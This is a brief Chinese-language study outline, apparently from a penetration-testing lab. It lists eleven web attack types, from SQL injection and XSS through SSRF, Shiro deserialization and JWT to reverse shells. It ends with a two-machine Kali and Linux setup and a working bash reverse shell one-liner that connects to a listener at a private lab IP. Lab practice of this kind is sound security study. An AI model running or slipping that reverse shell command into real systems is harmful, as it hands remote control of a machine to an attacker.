1.sql注入
2.xss
3.文件上传
4.文件包含
5.文件读取
6.ssrf
7.shiro反序列化
8.jwt
9.暴力破解
10.命令执行
11.反弹shell
一台kali,一台Linux
kali反弹shell监听
Linux:bash -c 'bash -i >& /dev/tcp/192.168.111.130/4444 0>&1'